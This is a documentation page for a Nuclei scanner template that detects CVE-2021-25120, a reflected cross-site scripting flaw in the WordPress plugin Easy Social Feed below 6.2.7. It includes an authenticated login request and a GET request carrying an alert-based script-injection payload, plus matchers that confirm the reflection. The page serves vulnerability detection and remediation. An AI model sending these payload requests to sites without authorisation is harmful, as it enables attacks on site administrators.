Easy Social Feed < 6.2.7 - Cross-Site Scripting
ID: CVE-2021-25120
Severity: medium
Author: dhiyaneshDk
Tags: cve2021,cve,wordpress,wp-plugin,xss,authenticated,wpscan,easysocialfeed
Description
Section titled “Description”Easy Social Feed < 6.2.7 is susceptible to reflected cross-site scripting because the plugin does not sanitize and escape a parameter before outputting it back in an admin dashboard page, leading to it being executed in the context of a logged admin or editor.
YAML Source
Section titled “YAML Source”id: CVE-2021-25120
info: name: Easy Social Feed < 6.2.7 - Cross-Site Scripting author: dhiyaneshDk severity: medium description: Easy Social Feed < 6.2.7 is susceptible to reflected cross-site scripting because the plugin does not sanitize and escape a parameter before outputting it back in an admin dashboard page, leading to it being executed in the context of a logged admin or editor. remediation: | Update to Easy Social Feed version 6.2.7 or later to mitigate the vulnerability. reference: - https://wpscan.com/vulnerability/6dd00198-ef9b-4913-9494-e08a95e7f9a0 - https://wpscan.com/vulnerability/0ad020b5-0d16-4521-8ea7-39cd206ab9f6 - https://nvd.nist.gov/vuln/detail/CVE-2021-25120 - https://github.com/ARPSyndicate/cvemon - https://github.com/ARPSyndicate/kenzer-templates classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2021-25120 cwe-id: CWE-79 epss-score: 0.00106 epss-percentile: 0.43227 cpe: cpe:2.3:a:easysocialfeed:easy_social_feed:*:*:*:*:pro:wordpress:*:* metadata: max-request: 2 vendor: easysocialfeed product: easy_social_feed framework: wordpress tags: cve2021,cve,wordpress,wp-plugin,xss,authenticated,wpscan,easysocialfeed
http: - raw: - | POST /wp-login.php HTTP/1.1 Host: {{Hostname}} Origin: {{RootURL}} Content-Type: application/x-www-form-urlencoded Cookie: wordpress_test_cookie=WP%20Cookie%20check
log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1 - | GET /wp-admin/admin.php?page=easy-facebook-likebox&access_token=a&type=</script><script>alert(document.domain)</script> HTTP/1.1 Host: {{Hostname}}
matchers-condition: and matchers: - type: word part: body words: - "'type' : '</script><script>alert(document.domain)</script>'"
- type: word part: header words: - text/html
- type: status status: - 200# digest: 4a0a004730450220464bf9451075cd001ebc69086bf0e00ff281ca81aafd6f80661d659af1708faf022100a6a3703e766408176ca144f58807b069029f0d7b261eecbddb380f88e75e3850:922c64590222798bb761d5b6d8e72950Guide to check the vulnerabilities
Section titled “Guide to check the vulnerabilities”This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.
$ nuclei -u "URL" -t "http/cves/2021/CVE-2021-25120.yaml"